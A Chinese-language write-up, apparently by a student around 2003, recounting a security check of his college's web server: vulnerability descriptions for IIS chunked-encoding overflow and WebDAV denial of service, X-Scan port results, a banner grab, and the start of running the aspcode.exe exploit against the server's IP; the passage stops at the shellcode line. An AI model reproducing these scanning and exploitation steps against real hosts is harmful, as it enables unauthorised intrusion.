[检测原理]
根据安全检测软件和漏洞专查工具对预定主机进行安全检测,根据检测结果进行安全分析,以中联绿盟和官方的安全公告作为检测和修补建议的根据……
1、 绿盟科技于2002年04月13日 16:54:04发布的IIS .asp映射分块编码远程缓冲区溢出漏洞
受影响的系统:?
Microsoft IIS 4.0- Microsoft Windows NT 4.0
Microsoft IIS 5.0- Microsoft Windows 2000
漏洞描述:
Microsoft IIS(Internet Information Server)是MS Windows系统默认自带的Web服务器软件。
IIS 4.0/5.0/5.1 ASP (Active Server Pages) ISAPI过滤器存在远程缓冲区溢出漏洞,远程攻击者可以利用此漏洞得到主机本地普通用户访问权限。
默认安装的IIS 4.0/5.0/5.1服务器加载了ASP ISAPI过滤器,它在处理分块编码传送(chunked encoding transfer)机制的代码中存在一个缓冲区溢出漏洞。攻击者通过提交恶意分块编码的数据可以覆盖heap区的内存数据,从而改变程序执行流程,执行任意攻击者指定的代码。此安全漏洞由微软自行发现,此漏洞与“Microsoft IIS 4.0/5.0 .asp映射分块编码远程缓冲区溢出漏洞”( http://security.nsfocus.com/showQuery.asp?bugID=2551 )有着相似的原理和后果。但是此漏洞同时也影响IIS 5.1,并且无法通过URLScan工具消除威胁。如果攻击者使用随机数据,可能使IIS服务崩溃(IIS 5.0/5.1会自动重启)。如果精心构造发送的数据,也可能允许攻击者执行任意代码。成功地利用这个漏洞,对于IIS 4.0,远程攻击者可以获取SYSTEM权限;对于IIS 5.0/5.1攻击者可以获取IWAM_computername用户的权限。
2、 微软公司于2003年3月17日发布的Microsoft IIS WebDAV 拒绝服3、 务漏洞
影响系统:
Microsoft IIS 5.0
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
Microsoft IIS 5.1
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP 64-bit Edition SP1
- Microsoft Windows XP 64-bit Edition
漏洞描述:
Microsoft IIS是一款HTTP服务程序,IIS 5.0/5.1包含WebDAV组件。WebDAV允许WEB开发队伍和其他工作组可以使用远程WEB服务器共同协作工作。IIS 5.0/5.1在为WebDAV请求分配内存时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击。由于IIS 5.0/5.1在为WebDAV请求分配内存处理不正确,如果攻击者发送畸形WebDAV请求给服务器,IIS会在服务器上分配一超大的内存给这个请求。通过发送多个相同形式请求,可导致消耗服务器上所有内存而停止对正常请求进行响应。此漏洞只有在服务器上运行了索引服务和服务器允许WebDAV请求的情况下才存在。
[检测过程]
1、 开起计算机,连接互联网,在本地计算机下打开一个命令行窗口,在C:WINDOWS>后面键入ping http://www.gliet.edu.cn/,可以看见反馈IP202.103.243.105,然后是超时反馈,丢失100%,这里要顺便说说,经常有人说PING不通是安装了防火墙,这里冰血要说,不一定!
(1) 对方主机真的不在线,所以没办法回应!
(2) 方主机安装了防火墙,屏蔽了ICMP报文,不反馈ECHO数据包!
(3) 对方在注册表中进行了安全设置,不回复ICMP报文!
(4) 对方在IPsec中拒绝了PING!
这个就是学校网站主机的IP地址!不管那么多了,反正得到IP了……
得到了IP,在我们开始扫描,启动X-SCAN2.3在扫描参数里面的基本设置填好IP记住,这样PING不通的在扫描的时候一定要选择“无条件扫描”!然后,为了全面检测,我们勾选了所有的检测选项,时间长点,但是慢慢来:)
打开QQ和其他人聊了会WEBDAV漏洞,
不久扫描结果出来了(为了简短只挑选了关键的部分):
[202.103.243.105]: 端口21开放: FTP (Control)
[202.103.243.105]: 端口25开放: SMTP, Simple Mail Transfer Protocol
[202.103.243.105]: 端口80开放: HTTP, World Wide Web
[202.103.243.105]: 端口135开放: Location Service
[202.103.243.105]: 端口139开放: NETBIOS Session Service
[202.103.243.105]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
[202.103.243.105]: "IIS漏洞"扫描完成, 发现 1.
另外,x-scan2.3是早先出的,似乎对WebDAV漏洞是无法检测(最近有更新版本可以检测到),至于这个我们使用上文提到的孤独剑客前辈站点提供的WebDAV漏洞专用工具包中的专用扫描器WebDAVScan.exe:
启动WebDAVScan.exe主程序,添入IP,开始扫描……瞬间提示发现WebDAV漏洞!!!!
下面我们对结果进行分析:
[202.103.243.105]: 端口21开放: FTP (Control)/*文件传输协议*/
冰血不知道这个是什么意思?对互联网开放FTP?是不是为了方便在网络外部的老师或者管理员管理,但是从安全角度来说真的是很危险,因为这样会留有隐患,还不知道有没有密码设置的简单的用户呢?
[202.103.243.105]: 端口25开放: SMTP, Simple Mail Transfer Protocol/*简单邮件传输协议*/
这个有可以利用的价值,但是并不是很大,因为POP此时没开放
[202.103.243.105]: 端口80开放: HTTP, World Wide Web
80端口可以用来刺探主机的相关信息,方法是打开一个命令行,在C:WINDOWS>后面键入telnet 202.103.243.105 80
指令如下:
C:WINDOWS>telnet 202.103.243.105 80
然后键入get回车后得到服务器信息……不过这里我们采用X-SCAN刺探到的,因为扫描前其实冰血封情已经用过telnet 202.103.243.105 80,但是毕竟是电子类院校,刺探到的只有“**电子工业学院”几个字:(
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 12 Apr 2003 11:45:25 GMT Content-Length: 31218 Content-Type: text/html Expires: Sat, 12 Apr 2003 11:44:25 GMT Set-Cookie: ASPSESSIONIDGGGQQLRQ=CHBMFCPDNOAMCILKIBINPLIA; path=/ Cache-control: private Connection: close Proxy-Connection: close
(其实X-SCAN刺探的更加详细)
[202.103.243.105]: 端口135开放: Location Service
没什么太值得利用的,这次主要不是它,不过这里可以大致揣测对方主机的系统类型……
[202.103.243.105]: 端口139开放: NETBIOS Session Service
这次的重点不是它,但是还是顺便介绍一下,98下NETBIOS有个密码校检BUG,只检测共享密码的第一个字,只要用特定的工具就可以对共享密码长驱直入,但是从上面看似乎是NT架构的,不过是可以用网际进程连接了……
[202.103.243.105]: 可能存在"IIS .asp映射分块编码远程缓冲区溢出"漏洞
这里开始说这整个安全检测的重点,可以看到暴露了IIS .asp映射分块编码远程缓冲区溢出漏洞,前面已经介绍了这个漏洞的危险性这里就不赘述了。
[202.103.243.105]: Microsoft IIS WebDAV 拒绝服务漏洞
是2003年内3月最新发布的,前面也事先说明白了,我们这里就也不多说了!它的恐怖和严重后果冰血封情会在后面的数据处理让大家看看……
[数据处理] 以下是在模拟系统中做的,否ASP溢出要提升权限!
当冰血第一次注意到母校的主服务器存在此漏洞的时候就和陈老师说了,陈老师给了我很大的鼓励,并告诉我应该将报告递交到网络中心,而且陈老师在非典封校期间给冰血的安全检测提供宽松的环境,从而为此重大安全漏洞的及时修补画上了重要圆满的一笔!
鸣谢:桂林电子工业学院优秀的年级主任陈文武老师提供正确的思想引导!
1、这里很明显我们针对的是"IIS .asp映射分块编码远程缓冲区溢出"漏洞;
对于这个漏洞的溢出方法,主要是用aspcode.exe程序傻瓜式的就可以溢出,冰血封情还是大概说说吧具体过程如下:
运行aspcode.exe。
D:tools>aspcode
IIS ASP.DLL OVERFLOW PROGRAM 2.0
copy by yuange 2002.4.24.
welcome to my homepage http://yuange.year.net/
welcome to http://www.nsfocus.com/
usage: aspcode <server> [aspfile] [webport] [winxp]
please enter the web server: 202.103.243.105
please enter the .asp filename:index.asp
(如果不行还可以尝试default.asp、home.asp、index.asp、login.asp、search.asp、localstart.asp…学校是index.asp,但是不知道完全可以穷举,就那么几个)
nuke ip: 202.103.243.105 port 80
shellcode long 0x13e7
